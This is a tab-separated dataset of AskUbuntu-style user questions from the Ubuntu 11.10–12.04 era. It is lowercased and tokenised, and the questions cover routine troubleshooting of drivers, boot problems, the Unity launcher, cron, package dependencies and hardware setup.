138552	ubuntu 11 and 12 initially fast but later bogs down , cpu pegged	i started with ubuntu 11 a few weeks ago . it 's on a dell m4300 with a ocz ssd . default setup , except that i 've installed the proprietary nvidia graphics and broadcom wireless drivers . dual boot with windows . if i cold boot into ubuntu , it is very fast , just like the windows experience that i 'm used to . but something happens , and i have n't yet determined what , but the system gets incredibly slow and stays that way . at first i thought it had to do with adobe flash because it seemed to be triggered by sites with flash . but then i removed flash and the problem remains . i thought it was just an overheating problem , but i 've now upgraded to 12.04 which supposedly fixes the overheating problems i 've read about . perhaps the heat situation was brought on by flash in my early cases ? so i installed jupiter for cpu management , but the thermometer reports a familiar windows-side temperature of 53 degrees celsius . switching jupiter to lower performance does n't help . when i check the system monitor application , sorting by cpu usage , there are no obvious problem processes . however , in the graphs tab , both cpu cores are pegged at 100 % ! i notice that the slowness seems to be similar to the extremely bad performance i got prior to installing the nvidia drivers . i 'm not sure if that helps . this is the strangest part to me - although the temperature seems ok , even after rebooting , the system remains slow - starting with grub2 which is very noticeably delayed , all the way through to either ubuntu or windows ! that 's right , even the windows side suffers effects and takes several minutes to complete booting whereas normally ( with my ssd ) it 's ready to use in 15 seconds . the only way to fix it is to shutdown and let the parts cool down . or maybe it just needs to completely power off and boot rather than a soft reboot , temperature has nothing to do with it ? - is that possible ? but know that i have never had this problem in windows , even if windows gets very hot ( 135 f ) a reboot would be enough time for it to recover . for this reason , i do n't think it 's a heat thing , but i ca n't imagine what else could be surviving the reboot . i 'm entirely updated - there are no pending updates . i have the post-release updates of nvidia too , btw . if this sounds close to something you know about , but one of the details does n't line up exactly , it might be a mistake in my perception . are there tests you can suggest to rule something out ? thanks ! processor : 0 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu t9500 @ 2.60ghz stepping : 6 microcode : 0x60c cpu mhz : 800.000 cache size : 6144 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 lahf_lm ida dts tpr_shadow vnmi flexpriority bogomips : 5187.00 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu t9500 @ 2.60ghz stepping : 6 microcode : 0x60c cpu mhz : 800.000 cache size : 6144 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 lahf_lm ida dts tpr_shadow vnmi flexpriority bogomips : 5186.94 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : ( redundant figures removed . you can view them in the edits if they are still relevant ) ps : % cpu pid user command 9.4 2399 jason gnome-terminal 6.2 2408 jason bash 17.3 1117 root /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none 13.7 1667 jason compiz 1.3 1960 jason /usr/lib/unity/unity-panel-service 1.3 1697 jason python /usr/bin/jupiter 0.9 1964 jason /usr/lib/indicator-appmenu/hud-service 0.6 1689 jason nautilus -n 0.4 1458 jason //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session i should highlight specifically that grub2 can also be very slow . i do n't know the relationship of which scenarios grub2 is also slow , but when it is slow , it is slow both before the menu appears and after the selection is made - although for the diagnosis of grub2 it is harder for me to tell what the normal speeds should be . with ssd , i would expect that grub2 could load instantly , and that the grub2 purple would disappear instantly after the selection . the only delay to be expected is the change in graphics modes ( though i could n't guess why that ever requires any noticeable time )
138553	icons ca n't be seen on ubuntu 12.04 lts 's launcher after updates	after updating yesterday , ( can unfortunately not remember the specific updates ) the launcher could not be made to appear . rebooting the system showed the launcher only as a black bar at the left edge of the screen without any icons in the launcher . if the mouse arrow is moved over the black launcher bar , the names of the applications next to the launcher appears . what could be done to have the icons to be visible in the launcher ?
138554	jupiter temperature units preference ?	i 'm using jupiter to manage my cpu speed . is there a place to change it to display the core temp in fahrenheit ? i ca n't find the config file .
138556	identify wireless mac address	i have a desktop for which i am using an asus n-10 usb wireless adapter . no driver software is needed i guess since i can see the available wifi networks . however , i am unable to connect as the `` mac address '' i gave to my service provider is incorrect . i provided the wlan hwaddr which i think is the equivalent of the mac address but it is still not correct . a different windows machine works fine so i know there are no mistakes . how can i find the correct number which is the equivalent of a mac address .
138558	how to store pictures folder on another hard drive ?	i have multiple drives in a desktop computer . i want one of those drives to function as my /home/username/pictures folder . can this be done ? i thought symbolic links could do this , but i 'm not having any success . the target drive is /media/images . here 's what i tried so far : all four variations give me the same result , a shortcut inside the /pictures folder . this is n't what i want . i want the /pictures folder itself to be the shortcut . how do i do this ?
138560	can not connect android sgsii via usb after ics upgrade	i got ota update for my samsung galaxy s2 - android 4 ( ics ) . however , the adb devices does not show the device . neither does lsusb . i am using ubuntu inside vmware fusion on a mac . if i disconnect the device from ubuntu and use it in os x , adb devices shows the device . my udev rule contains the following entry : subsystem== '' usb '' , sysfs { idvendor } == '' 04e8 '' , mode= '' 0666 '' dmesg output does not include string 04e8 . i should note that i tried both usb modes ( mtp and ptp ) .
138561	reset to default unity login	i just installed kubuntu alongside ubuntu 12.04 , and it changed my login screen . i liked the ubuntu one and would like to set it back to the default . how can i do that ?
138567	how can i use my external display on my laptop with intel and nvidia video cards ?	my hardware : dell xps l502x laptop with integrated intel video card and an geforce gt 540m ( hdmi ) . my config : ubuntu 12.04 + nidia drivers 295.53 i did n't manage to use my external display neither in ubuntu 11.10 with older nvidia drivers . the problem is that when i want to open nvidia-setings i get you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . if i run nvidia-xconfig an xorg.conf file is generated and after reboot i get an 640:480 resolution on my laptop and nvidia-setings say the same thing . is there a way to use an external display ? i do n't care if i use nvidia , nuveau or other drivers .
138571	how to dynamically get name , version and other info from a python app at runtime	i 'm writing an python app that makes use of a gtk.aboutdialog . some of the information shown in the dialog comes from setting properties for bits of info i 've just given elsewhere , and i 'd like to avoid duplication . for instance , in the code : about = gtk.aboutdialog ( ) about.set_program_name ( `` qreator '' ) about.set_version ( '0.1 ' ) the program name and the version are already specified in setup.py ( i 'm using python-distutils-extra as the build system ) . so is there a way to extract that information at runtime ( be it from setup.py or somewhere else ) , so that i do n't have to manually specify it again ?
138572	installing ubuntu through vmware	i have windows 7 and i installed vmware 8.0.3 then i installed virtual ubuntu 12.04 through vmware , but when i open it i always get this message : vmware is currently being installed on your system . depending on the version of ubuntu you may log in below and use the system during installation . otherwise , please wait for the graphical environment to launch & i have this message for about 3 days.. what is the solution please ? thanks in advance
138575	does juju run on non-ubuntu distributions ?	i have been experimenting with juju for an upcoming platform evaluation question i know i will be asked : is it possible to run juju on non-ubuntu distros ?
138581	websites in firefox using only half of the screen	i 'm using ubuntu 12.04 , and i 've installed gnome3 on it . firefox used to run normally , but one day i used the `` snap '' feature to snap it to the left and then maximized it again . the websites however refuse to use the rest of the screen and instead use only the left half ( actually close to 70 % ) as shown in the screenshot . i have n't faced this problem with any other application , and any number of application restarts or system restarts ( including switching to unity ) have n't helped . if it helps , i was using the tree style tab extension to display my tabs in a sidebar on the left , but disabling the extension has n't helped , as the screenshot shows . how can i get it back to normal ?
138586	printing from an hp desktjet 1000 laser printer from a notebook running lubuntu 12.04 x86	i just connected an hp deskjet 1000 series to a 148b hp notebook . the notebook reads the printer as ( hp deskjet 1000 j110 ) . after the driver installed and the printer made available under `` printing '' app , '' a print test . right-clicked the printer icon and selected properties . under the `` settings '' tab , i selected `` print test page '' . the `` printer state '' notification box displayed , `` processing-sending data to printer . then it changes to , `` idle-sending data to printer '' . which at this point nothing happens . i did this multiple times . also , re-installed the printer driver . still the same issue . i tried the same printer on my desktop running ubuntu 12.04 with unity . the printer works fine . is there a reason why this would happen ?
138587	lost my efi settings	so , i installed ubuntu some weeks ago on my imac , and i was able to boot directly to it , but i ejected a cd while booting , and now i need to load ubuntu manually . i tried to use boot manager at os x , but it does n't detects the system partition . what should i do ? thanks in advance : )
138589	mutt runng from crontab	i have a bash script that is sending an email through command line mutt . this bash script is being called from a cron job ( setup using crontab -e because of permissions needed to do all items in the script ) . i set the from address so that users can reply ( which works fine ) , but the name being shown is `` root '' . this is causing some confusion . is there an actual way to set the name associated with the email address ? the email portion of the script is below : email=me @ domain.com export email mutt -s `` subject '' -a /home/user/directory/file*.xls -- user1 @ domain.com , user2 @ domain.com < /home/user/directory/message.txt thanks kevin
138592	what is the easiest way to rearrange pages in a pdf document ?	mac 's preview can be used to rearange pages in a pdf document by simply drag-and-dropping the pages around in the side panel . is there any equivalent tool for ubuntu ? i have noticed , that the document viewer , which comes with ubuntu , also has this nice side panel . however , it can not be used to manipulate a pdf document . if there is no drag-and-drop solution , what is the easiest way to rearrange pages in a pdf document ?
138595	setting correct ( 16:9 ) screen resolution for a philips 166v3lsb/00 lcd monitor	i have a philips 166v3lsb/00 lcd monitor connected to a box with ubuntu 12.04 lts . user @ host : ~ $ lspci 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) ... the monitor is supposed to support 1366x768 ( 16:9 ) but i can not get system settings/displays to even offer anything but ubiquitous 1024x768 and 800x600 . i tried removing ~/.config/monitors.xml and re-logging in but that did not help . update ( 1 ) : i tried forcing modeline to xorg.conf ( added modes `` 1366x768 '' `` 1024x768 '' `` 640x480 '' ) , but as a result : resolution os still the same system settings/displays now offers only 1024x768 ( it previously offered 800x600 as well ) here is my current xorg.conf and xorg.0.log . any more ideas ?
138598	ca n't install ubuntu 12.04 - black screen	i 've installed ubuntu on my laptop and it worked just fine but when i try to install it on my desktop i see a purple screen before it goes black . it looks like a command prompt but i never had that screen when i installed it on my laptop . it just sits at the black screen and nothing ever happens . i have an amd phenom ii 965 and an asrock mobo . any help would be appreciated .
138599	how to downgrade xorg-server package to ubuntu 11.10 version in 12.04	after upgrade from 11.10 to 12.04 ( lts ) x64 on my hp 6550 laptop , i 'm i faced with graphical bug in xorg-server-intel . i 've tried to install lower version but system said me that certain version not found . how to install lower version of xorg from previous ubuntu ?
138602	after entering the boot menu and select the flash drive , it does nothing .	ya he instalado en varios equipos ubuntu 12.04 pero este en especifico no me reconoce el pendrive , la memoria esta bin booteada , alguna idea ? translation : i installed ubuntu 12.04 on multiple computers but this in not recognizing the specific flash drive , memory booteada this bin , any ideas ?
138608	making `` gnome-system-monitor '' a custom shortcut `` ctrl+alt+del '' like windows `` task manager '' is n't working	i went to `` system settings '' , `` keyboard '' , `` shortcuts '' , `` custom shortcuts '' , i added a custom shortcut and called it `` task manager '' in the `` command line : '' i typed `` gnome-system-monitor '' , and i gave it the command , `` ctrl+alt+del '' , i apply that and close it . then i try it and get nothing ... ... why ? ?
138611	how to change audio bit depth and sampling rate ?	i 'm a novice linux user . i 'm currently using xubuntu 11.10 i like getting the best i can out of my hardware . this includes sound . in windows it was quite simple . i just went to the audio settings and set the bit depth and sampling rate to the biggest values available . with xubuntu though , it 's a little more tricky . there is no advanced settings in the graphic configurator . that means i have to look for bit depth and sampling rate in a configuration file . the thing is , i do n't know which one exactly . if anyone could tell me which one it is and which lines i have to modify , i would be grateful .
138614	downloading error `` could not retrieve the required disk image ``	when i try to download ubuntu 12.04 using the windows installer ( wubi ) through a proxy server which requires proxy authentication , after i choose the ubuntu installation size , username and password , when i click the install button , i get this error : an error occurred : could not retrieve the required disk image files for more information , please see the log file : c : \users\ ( myusername ) \appdata\local\temp\wubi-12.04-rev266.log the log file says : proxy authentication error how can i solve this problem ?
138620	is there any latex integration for email editors ?	there are some stackexchange pages , as well as blogs , which have latex integration , e.g . http : //mathematica.stackexchange.com/ . on these pages one can simply write math latex code using the $ delimiters . is there any email editor/plug-in for ubuntu which translates latex input to pictures , or keeps it as latex , and parses it in a nice way ? if not , is anybody aware of a tool , in which one can input latex code , and the output is an image ? drag & drop is appreciated .
138622	how to disable all unity animations ?	if it 's not possible then maybe just the dash show/hide animations . i simply find myself waiting for animations which is pointless .
138623	sheet name font size on libreoffice calc is too small	i am using libreoffice 3.5.3.2 ( ubuntu 12.04 ) and the buttons to switch tabs in calc are written with small fonts . they 're so small i ca n't even read what is written on them . i could not find a way to increase font size . is this problem happenning only with me ? does anyone know a way to increase the font size of sheet names ?
138625	some of my fn keys no longer work after may 8th updates	i seem to have the same issue described here fn keys f9 - f12 do not work on an asus u30sd and it 's happened before while running 12.04 beta but im currently running stable and it seems an update that was pushed on or around may 8th has messed up my fn keys ( just the f9-f12 ones , everything else is good ) my issue is that updating to the latest everything hasnt solved my issue but rather caused it during the updates that happened that day i was asked ( and hardly payed attention ) if a config file should be replaced with default or kept as modified - i replaced with default , but im honestly not sure what config file it was in ubuntu software center i can go to history and choose updates and see what and when and maybe get some sort of list here if it helps , but i would imagine everyone running ubuntu saw the same updates that day ( assuming they did updates that day ) for reference i am running an asus 1215n
138629	how to define keyboard shortcut to suspend xubuntu 12.04 ?	i 'm using xubuntu 12.04 on a macbook pro . i would like to define a keyboard shortcut ( ctrl + alt + l ) that let 's me lock the screen ( suspend ) xubuntu . i how can i suspend using a keyboard shortcut , without administrator privileges ? the problem is the following : when i try to to define a new shortcut with system - > settings - > settings manager - > keyboard - > application shortcuts - > add , i only see shortcut : [ no area to type in ] command : ___________ [ area to type in ] that means i can put in a command , but no shortcut . is this a bug ?
138630	ubuntu 12.04 lts . what is the best and most reliable method to mount a ntfs partition ?	... and having full access on it plus auto mount option on ubuntu startup ? thanks , dave
138640	why is deja-dup slow to backup to ubuntu one location ?	i am using deja-dup to backup my home directory to ubuntu one . doing a full backup seems to take at least a day . my broadband upload speed is measuring about 3mb/s at the moment , but when i use system monitor and look at the network traffic whilst deja-dup is running , it seems to only be uploading about 20kb/s . this is making the backup unsuable . any ideas why it 's not using more network bandwidth ? i am using ubuntu 12.04 , but had the same problem in 11.10 . backing up to a network drive on the local network is fine , so it seems that uploading to ubuntu one is slow ?
138641	message `` call to lnusertemp failed ( temporary directories full ? ) . check your installation ? '' displayed in x before kdm	this has started to happen after i encrypted my home folder ( this was done after the installation , not as a part of it ) ... this was in 11.10 . i have since upgraded to 12.04 and after first reboot everything worked well . however since reboot after this , the messages started to pop up again before the actual kdm login prompt . i am using kubuntu 12.04 and i have tried different things such as permissions 777 for /tmp , removing everythign from /tmp or even deleeting ~/.kde or ~/.xauthority etc . any ideas ?
138644	fonts suddenly look different and larger , unity panel larger , notification bubbles smaller on account .	so , i have absolutely no idea how any of this happened . i first noticed that my chromium font was different . i thought nothing of it . then , a ton of odd things happened . all of my fonts looked very different . they were larger than normal . the panel in unity was thicker than normal . the notification bubble was about half the size as it should be . and , to top it all off , gnome-terminal does not work period unless i do gksu gnome-termial when i press alt-f2 . what the heck happened ? how on earth do i fix this ? this happens on gnome and unity . edit : i tried a guest account ... none of these problems exist . so , i know it has to do with my particular home directory settings
138646	ubuntu 12.04 stuck on splashscreen - not due to upgrade	all of a sudden when i startup my comp i 'm stuck at the splash screen and never get anywhere . i 'm on 12.04 but the upgrade is n't the problem as i 've been running it without any problems so far . i changed the display settings as it was set to run on 2 screens and restarted and that 's where i 'm at now . does anyone have any idea on what 's causing this ? i mean surely not just from changing my display setting ? any help is greatly appreciated .
138652	cpu high temperatures 12.04	hi i have a acer aspire 4530 with a amd athlon ( tm ) x2 dual-core ql-62 × 2 prossesor . i installed ubuntu 12.04 and now my laptops temperatures are realy high specially when using flash . this is one of my temperature readings ive had higher temperatures than this cpitz-virtual-0 adapter : virtual device temp1 : +80.0°c ( crit = +105.0°c ) k10temp-pci-00c3 adapter : pci adapter temp1 : +79.1°c ( high = +70.0°c ) anything i could do to fix this ?
138656	install program from tar.bz2	could someone explain to me in the simplest way possible how to install a program from a .tar.bz2 file ? i 've looked this up and went through numerous tutorials but could n't get it to work at all . most replies to this question seem to be incomplete or intended for more advanced users . let 's say the file is located at /home/user/file.tar.bz2 i 'm using ubuntu 12.04 . edit i ran the command rinzwind suggested and then opened the directory it created in the terminal . next i ran ./configure and i got the following message when it finished . checking for babl ... no configure : error : package requirements ( babl > = 0.1.10 ) were not met : no package 'babl ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables babl_cflags and babl_libs to avoid the need to call pkg-config . see the pkg-config man page for more details what happened ? edit 2 rinzwind : everything with babl went seemingly okay but i had a problem with gegl : checking for glib - version > = 2.28.0 ... no *** could not run glib test program , checking why ... *** the test program failed to compile or link . see the file config.log for the *** exact error that occured . this usually means glib is incorrectly installed . configure : error : *** glib 2.28.0 or better is required . the latest version of *** glib is always available from ftp : //ftp.gtk.org/ . i took a guess ( probably a bad idea ) and did the following : wget ftp : //ftp.gimp.org/pub/glib/2.32/glib-2.32.1.tar.xz tar -xvf glib-2.32.1.tar.xz cd glib-2.32.1 ./configure but then i got this error checking for inflate in -lz ... no configure : error : *** working zlib library and headers not found *** what happened ?
138657	is there a shell-independent hud-like menu search tool for xfce/gnome/cinnamon ?	the ubuntu heads-up display ( hud ) - you love it or you hate it . personally i rather like a classic desktop , so i use xfce or gnome-fork cinnamon , and i 'd like to keep those menu 's where they are . but the hud is pretty awesome when your menus are complex and you forgot where an option sits . this makes that search trick very interesting . i know the hud is unity specific . i am looking for a hud-like tool to complement the menu in shells other than unity . there is appmenu runner for kde that does this . there is also appmenu-qt for kde . problem with the above is that it uses kde libs , and it only works for kde apps . this is linux , there aught to be something like this for gnome/gtk apps , right ? looking for any tool that can search the menus . i already use ( d ) synapse , kupfer and gnome do , but those are simply app-launchers ( with some tricks ) . something like that would suffice if only they included searching the menus for the currently focused application . the hud allows users to activate menu items by typing part of the name . it uses a fuzzy search algorithm that will highlight partial matches . it can match menu items that are multiple layers deep in an application 's menu hierarchy . the feature , which replaces traditional menu accelerators , is activated by pressing the alt key . similar questions : is there a way to search a menu bar in debian ? - unix.stackexchange how can i access menu bar items alike hud ( unity ) ? - unix.stackexchange hud in other window managers ( especially xmonad ) - askubuntu
138661	how to suspend from command line such that screen is locked ?	i 'm using xubuntu 12.04 . in the power manager , i have checked extended - > lock screen when going for suspend/hibernate . if i choose to suspend from the main menu / panel 1 , the screen is locked . however , if i use dbus-send -- system -- print-reply -- dest= '' org.freedesktop.upower '' /org/freedesktop/upower org.freedesktop.upower.suspend ( see how can i suspend/hibernate from command line ? ; i use this command via a keyboard shortcut ) , the screen is not locked . how can i ( 1 ) suspend the system ( 2 ) have the screen locked at the same time ( 3 ) do not require root rights to do so [ since i would like the command to be assigned to a keyboard shortcut ] .
138668	is there a program that tells ram usage ?	i have ubuntu 12.4 lts and i need a program that will be able to monitor my ram usage . any suggestions ?
138671	cron job not executing ?	i 'm trying to execute a php script every two minutes on my server , but it does n't seem to be working . i 'm using the following cron job : 2 * * * * /usr/bin/php /srv/www/ < snip > / < snip > /run.php i also tried : 2 * * * * php /srv/www/ < snip > / < snip > /run.php both of which execute properly via the ssh command line . i entered the cron job in with the following method via ssh : crontab -e i 'm also running ubuntu 10.04.3 lts if that matters . is there something i 'm doing wrong ? any advice ?
138672	is it easy to install apache web server on ubuntu desktop ?	so i have decided to build a ubuntu computer , for now i am going to dual boot with win7 , and then install apache web server . figured i would give the whole web thing a try . did some searching but did n't find something powerful enough , i will continue searching as i am sure there is a multitude of items on here ... but one quick question . has anyone installed ubuntu desktop , and then apache web server ? was it easy to do ?
138678	information regarding who to contact for submitting books to software centre	i am wondering who i need to get in touch with to find out information regarding books in the ubuntu software centre . what are the requirements ? does ubuntu get a percentage regarding the sale ( like apples app store ) and who do we need to submit it to ? i am interested in doing manuals and novels for the ubuntu software centre since i wish to support the idea . thanks in advance !
138679	writing to serial usb to control an ardunio from an ubuntu computer	i want to control and ardunio by writing bytes to it in the same way i would use the serial monitor on my laptop . how could one accomplish this ?
138682	autohide question	i have a ten inch screen , and firefox is crowded to the right by what people seem to be calling the left unity panel , so i have to slide the window to see the end of line . i wish to make this panel vanish and the full screen be covered by firefox . ( clicking on the little box at the top of firefox makes it smaller , not larger . ) i am not sure this is an autohide question , but it is a window manager question . the post numbered 132796 about autohide was marked closed because it duplicated another ; but i could not find what to click on to see the other .
138691	how to connect to ubuntu server using external ip	i do not have a static ip because my external rarely changes . how can i connect via ssh and ftp via an external ip address .
138699	live ubuntu usb help	i have a live ubuntu usb . how can i do for boot automatly in `` try ubuntu without installing '' thanks ( it 's a bootable usb ubuntu 11.10 )
138700	ubuntu 12.04 blank purple splash screen after live install	i initially had problems running the live cd after downloading it and burning the iso to a cd . after rebooting , the system would just hang with a blinking cursor at the black screen . after pressing a key and getting to the advanced boot options , i selected no apci and selected try ubuntu . this seemed to work . after loading from the live cd , i then selected the option to install the lts . the install seemed to finish successfully . upon reboot however , it hangs at the purple screen which is just blank . i overwrote the previous os which was win7 . any ideas ?
138703	weird networking issue under 12.04	i am having problems with networking in the command line , specifically with the gem installer ( i had similar issues yesterday but ca n't remember exactly what with ) . so , i am getting : pete @ pete-latitude-e6510 : ~ $ sudo gem install bundler [ sudo ] password for pete : error : while executing gem ... ( gem : :remotefetcher : :fetcherror ) errno : :econnrefused : connection refused - connect ( 2 ) ( http : //rubygems.org/gems/bundler-1.1.3.gem ) next , i ca n't ping external addresses : pete @ pete-latitude-e6510 : ~ $ ping -c 3 209.85.231.104 ping 209.85.231.104 ( 209.85.231.104 ) 56 ( 84 ) bytes of data . from 10.8.8.2 icmp_seq=1 destination port unreachable i am behind a proxy . i can ping the default gateway ( i believe it is ) on 10.8.8.2 and the proxy on 10.8.8.13 ( which runs on a non-standard port ) . apt-get , for example , works fine from the command line , and all access ( browser , update manager , etc ) works fine in the gui . i have googled extensively but ca n't get further at the moment .
138705	run shell script from launcher with root permissions	i have a shell script that runs a gui application on ubuntu 12.04 . the way i 'm currently running the application is that i open the terminal and go to the directory that contains that file , then do sudo ./shellscriptfilename which runs just fine , however i have two problems , one is that this takes so much time so i would like to add a shortcut in the launcher , second is that the terminal needs to stay open , which is a pain ( hopefully this wo n't be a problem after i 'm able to run it from the launcher . clarification : i would like for the terminal to be closed when my application starts running .
138706	dell inspiron 1210 mini blank screen on boot 12.04	dell inspiron 1210 mini blank screen on boot 12.04 if i mash buttons i get to a gray screen then the login screen and into the desktop but normally i turn on the laptop and i see a black screen with a cursor then a purple screen then it just goes black . i can hit ctrl alt f1 or f2 and get a prompt . i 've tried using the poulsbo ppa driver script fix but that does n't work . i do n't knwo what to do now . i have the os installed and when i did get into the os by mashing buttons i installed updates and wireless adapter drivers . it works but if i reboot i jsut get to the black screen and have no idea what to do . what needs to be done so that i can just boot up and see the login screen ! ?
138712	unable to upgrade to ubuntu 12.4 for dell vosto v131	i am running ubuntu 11.10 on vosto v131 and not able to upgrade to 12.4 . i tried several times to do it through 'update manager ' but failed . i tried from a terminal using : sudo apt-get update & & sudo apt-get upgrade then do-release-upgrade and got the following error : authenticate 'precise.tar.gz ' against 'precise.tar.gz.gpg ' exception from gpg : gnupg exited non-zero , with code 2 debug information : gpg : signature made fri 20 apr 2012 01:49:33 pm edt using dsa key id 437d05b5 gpg : ca n't open `/etc/apt/trusted.gpg' gpg : keydb_search failed : file open error gpg : ca n't check signature : public key not found authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . any idea how to handle it ?
138717	keep the same ubuntu boot screen while keeping a desktop package	i have ubuntu 10.04 . just after installing ubuntu , i installed all the desktop packages except lubuntu . then when i restarted the computer , ubuntu shows the kubuntu boot screen when i restart the computer . next i uninstalled all the desktop packages except ubuntu-desktop . the boot screen changed back to the ubuntu one . so how can i retain the ubuntu boot screen while keeping the other desktop packages ?
138722	12.04 gpu lockup	i was able to install ubuntu 12.04 using the alternative version of the image , ( 64 bit ) but when i start the system it tells me the gpu locked up , and instead presents a text only screen . i understand that this site is not for bug reports , but at the same time , i know that there are some versions of the installer than have to be compatible with my graphics card ( nvidia gts 360m ) . i assumed that the mere fact that the alternative installer ran was an indication that i could get some sort of graphical interface running after the install . is there some way of getting some type of graphical interface running on my machine ? even better would be is there a way to get the rest of the system running as normal ( i.e . gpu up and running ) ? if an internet connection is required to download driver support or something similar , directions for how to configure a wireless connection with wpa2-personal protection from the text-only interface ( bash ) . any help would be appreciated . note : i was able to find this which tells me that the card is supported . note 2 : in the install software stage of the install , i was unable to install anything ( no internet connection ) update : the exact error message is [ 8.591394 ] [ drm ] 0000:01:00.0 : gpu lockup - switching to software fbcon update 2 : if i try to install with the regular version of ubuntu , the screen goes staticy . this also happens if i install with wubi ( distasteful i know ) and then try to use ubuntu . update 3 : i 've tried xforcevesa , nomodeset and xforcevesa nomodeset as my wubi boot options . update 4 : thanks to jokerdino , i can now connect to the internet , so internet tools would now be a possibility .
138723	asus laptop wo n't reboot on windows 7/ubuntu dual boot after running windows	i shrunk my hdd and installed ubuntu 12.04 . everything worked great , but if i reboot and run windows and reboot , all i get is the `` asus '' screen and a cursor int the top left corner for a few seconds before it repeats the cycle . as long as i do n't ever boot windows , i do n't have this problem . within ubuntu i can access all of my documents , etc . but there are certain things that i have to do in windows . so far , what i 've been doing is just reinstalling ubuntu whenever i absolutely have to run windows , but it 's getting annoying . at least the install is fast and easy , but i 'd like to be able to modify a few things and have them stick .
138725	panel notifcation - how can i update gsettings to add 'skype '	gsettings get com.canonical.unity.panel systray-whitelist shows [ 'javaembeddedframe ' , 'mumble ' , 'wine ' , 'hp-systray ' , 'scp-dbus-service ' ] how can i make it be [ 'javaembeddedframe ' , 'mumble ' , 'wine ' , 'skype ' , 'hp-systray ' , 'scp-dbus-service ' ] i tried gsettings get com.canonical.unity.panel systray-whitelist [ 'javaembeddedframe ' , 'mumble ' , 'wine ' , 'skype ' , 'hp-systray ' , 'scp-dbus-service ' ] but i seem to get an eror and it was n't changed : - usage : gsettings set schema [ : path ] key value set the value of key to value arguments : schema the name of the schema path the path , for relocatable schemas key the key within the schema value the value to set
138726	battery icon changed ?	i do n't know what happened , but today when i logged in to ubuntu 12.04 , the battery icon looked strange ( when unplugged ) : when it 's plugged , the icon looks as always been , the problem is when it 's not plugged in : i 'm using ubuntu-mono-dark as the main theme , but trying to change the themes does n't do anything , that `` ugly '' icon remains the same . any ideas if this is a bug or something ? ( or how to fix it )
138728	b43 device firmware error - 12.04 installation	trying to install ubuntu and i get this error . really have no idea what to do . i tried to go the website it listed but i could n't find anything close to what i have in this system . i 'm guessing i need a driver or something to complete the install ?
138734	software center - items can not be installed or removed until package catalog is repaired ''	i tried to install back in time and now i keep getting the message 'items can not be installed or removed until package catalog is repaired . i have tried sudo apt-get install -f then get reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : backintime-gnome the following packages will be upgraded : backintime-gnome 1 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 1 not fully installed or removed . need to get 0 b/39.4 kb of archives . after this operation , 24.6 kb of additional disk space will be used . do you want to continue [ y/n ] ? when i click y , i get the following message dpkg : dependency problems prevent configuration of backintime-gnome : backintime-gnome depends on backintime-common ( = 1.0.7 ) ; however : version of backintime-common on system is 1.0.8-1. dpkg : error processing backintime-gnome ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : backintime-gnome e : sub-process /usr/bin/dpkg returned an error code ( 1 ) stephanie @ stephanie-thinkpad-t61 : ~ $ sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of backintime-gnome : backintime-gnome depends on backintime-common ( = 1.0.7 ) ; however : version of backintime-common on system is 1.0.8-1. dpkg : error processing backintime-gnome ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : backintime-gnome
138736	which packages provide the pictured gnome-panel applets ?	which source packages contain the source code of the indicated applets ? if the answer is a catch all source package like `` gnome-applets '' , what is name and location of the individual applets within the source package ? note : i am using 12.04 .
138738	launcher does n't re-appear after i select auto-hide	i have 12.04 version . when i select on option for auto-hide the launcher i ca n't make it re-appear . it does n't matter what kind of `` hot spot '' reveal location i select or which reveal sensitivity level i select .
138739	glx missing , unity 3d/various programs are not working !	i just recently reinstalled ubuntu 12.04 and while i was installing my programs i found i could n't open blender . the application would n't start . when i typed it in to the console i got this message : xlib : extension `` glx '' missing on display `` :0.0 '' . /build/buildd/blender-2.63+svn46744/intern/ghost/intern/ghost_windowx11.cpp:197 : x11 glxqueryversion ( ) failed , verify working opengl system ! initial window could not find the glx extension , exit ! i 'm not sure what to do . i 've tried googling the issue but to no avail . any help ? ? !
138740	share internet to windows phone 7.5 through wifi	i have a windows 7.5 phone with which i would like to share internet with through wifi . the problem is that windows phone does not support adhoc connections and hence i can not simply share internet with it . anyone has any ideas/solutions ? digvijay
